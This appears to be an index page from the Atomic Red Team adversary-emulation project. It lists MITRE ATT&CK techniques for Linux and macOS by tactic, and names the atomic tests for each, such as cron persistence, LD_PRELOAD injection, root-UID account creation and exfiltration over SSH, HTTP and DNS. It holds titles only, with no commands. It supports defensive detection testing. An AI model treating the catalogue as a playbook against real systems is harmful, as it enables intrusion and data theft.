- T1491.002 External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491.001 Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1489 Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #5: Restart System via `reboot` - macOS/Linux [macos, linux]
- Atomic Test #6: Shutdown System via `halt` - Linux [linux]
- Atomic Test #7: Reboot System via `halt` - Linux [linux]
- Atomic Test #8: Shutdown System via `poweroff` - Linux [linux]
- Atomic Test #9: Reboot System via `poweroff` - Linux [linux]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# discovery
- T1087 Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1613 Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1087.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1069.002 Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1087.003 Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #3: Nix File and Diectory Discovery [macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1087.001 Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #1: Enumerate all accounts (Local) [linux]
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #5: Show if a user account has ever logged in remotely [linux]
- Atomic Test #6: Enumerate users and groups [linux, macos]
- [T1069.001 Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #1: Permission Groups Discovery (Local) [macos, linux]
- [T1046 Network Service Scanning](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #2: Network Share Discovery - linux [linux]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
- Atomic Test #2: Examine password complexity policy - CentOS/RHEL 7.x [linux]
- Atomic Test #3: Examine password complexity policy - CentOS/RHEL 6.x [linux]
- Atomic Test #4: Examine password expiration policy - All Linux [linux]
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [macos, linux]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
- T1518 Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# persistence
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
- Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
- Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md)
- Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [linux, macos]
- Atomic Test #2: CreateCronjob [linux, macos]
- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- [T1136.001 Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux]
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137 Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.002 Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.004 Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.002 Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# resource-development
- T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1583.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1584.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1587.002 Code Signing Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1588.003 Code Signing Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1586 Compromise Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1584 Compromise Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1583.002 DNS Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1584.002 DNS Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1587 Develop Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1587.003 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1588.004 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1583.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1584.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1608.004 Drive-by Target [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1585.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1586.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1585 Establish Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1587.004 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1588.005 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1608.003 Install Digital Certificate [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1608.005 Link Target [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1587.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1588.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1588 Obtain Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1583.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1584.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1608 Stage Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1588.002 Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1608.001 Upload Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1608.002 Upload Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1584.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1588.006 Vulnerabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1583.006 Web Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1584.006 Web Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# reconnaissance
- T1595 Active Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1591.002 Business Relationships [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1596.004 CDNs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1592.004 Client Configurations [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1589.001 Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1590.002 DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1596.001 DNS/Passive DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1591.001 Determine Physical Locations [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1596.003 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1590.001 Domain Properties [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1589.002 Email Addresses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1589.003 Employee Names [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1592.003 Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1592 Gather Victim Host Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1589 Gather Victim Identity Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1590 Gather Victim Network Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1591 Gather Victim Org Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1592.001 Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1590.005 IP Addresses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1591.003 Identify Business Tempo [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1591.004 Identify Roles [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1590.006 Network Security Appliances [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1590.004 Network Topology [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1590.003 Network Trust Dependencies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1598 Phishing for Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1597.002 Purchase Technical Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1596.005 Scan Databases [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1595.001 Scanning IP Blocks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1597 Search Closed Sources [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1593.002 Search Engines [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1596 Search Open Technical Databases [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1593 Search Open Websites/Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1594 Search Victim-Owned Websites [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1593.001 Social Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1592.002 Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1598.002 Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1598.003 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1598.001 Spearphishing Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1597.001 Threat Intel Vendors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1595.002 Vulnerability Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1596.002 WHOIS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# lateral-movement
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021.004 SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# command-and-control
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.004 DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #14: whois file download [linux, macos]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.003 Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.001 Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# execution
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1609 Container Administration Command](../../T1609/T1609.md)
- Atomic Test #1: ExecIntoContainer [linux, macos]
- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [linux, macos]
- Atomic Test #2: CreateCronjob [linux, macos]
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- [T1610 Deploy Container](../../T1610/T1610.md)
- Atomic Test #1: Deploy container using nsenter container escape [linux]
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.007 JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204.002 Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204.003 Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1106 Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.008 Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.006 Python](../../T1059.006/T1059.006.md)
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
- Atomic Test #2: Execute Python via scripts (Linux) [linux]
- Atomic Test #3: Execute Python via Python executables (Linux) [linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.005 Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# exfiltration
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# initial-access
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
